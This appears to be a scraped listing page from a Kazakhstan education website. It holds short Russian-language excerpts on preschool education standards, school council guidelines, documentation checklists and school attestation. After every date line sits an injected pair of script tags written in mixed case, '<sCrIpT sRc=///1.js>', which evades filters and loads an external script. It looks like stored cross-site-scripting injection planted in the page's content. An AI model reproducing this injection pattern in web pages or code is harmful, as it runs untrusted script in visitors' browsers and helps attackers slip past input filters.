04.04.2017<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Инструктивно-методическое письмо составлено согласно требованиям Государственного общеобязательного стандарта дошкольного воспитания и обучения по организации образовательного процесса в дошкольных организациях Республики Казахстан всех типов и видов независимо...
04.04.2017<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Настоящий государственный общеобязательный стандарт дошкольного воспитания и обучения (далее – стандарт) разработан в соответствии с Законом Республики Казахстан от 27 июля 2007 года «Об образовании» и определяет требования к уровню подготовки детей дошкольного...
04.04.2017<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
В методических рекомендациях изложены организационные основы деятельности школьного психолого-педагогического консилиума. В приложениях приведены образцы документации школьного консилиума. Рекомендации предназначены руководителям, специалистам (логопедам,...
04.04.2017<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
1) Общая характеристика организации образования;
1. Краткая характеристика ОО
- Информация об истории и дате создания ОО.
-О реализуемых специальностях (профессиях) в соответствии с лицензией.
-Информация о структуре организации, ее деятельности по долгосрочному,...
24.01.2017<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
1. Папка с нормативными документами (« Закон об образовании», «Закон о труде», «Конвенция о правах ребенка», и.т.д)
2. Номенклатура дел (утверждена начальником РОО)
3. Учебные планы (утверждены начальником РОО)
4. Папка самоаттестация школы
5. Паспорт школы
6. План...
24.01.2017<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Аттестация проходит в три этапа, конечная цель которых заключается в установлении соответствия реальных результатов деятельности образовательного учреждения заявленному типу и уровню.
На первом этапе образовательное учреждение проводит самоанализ своей...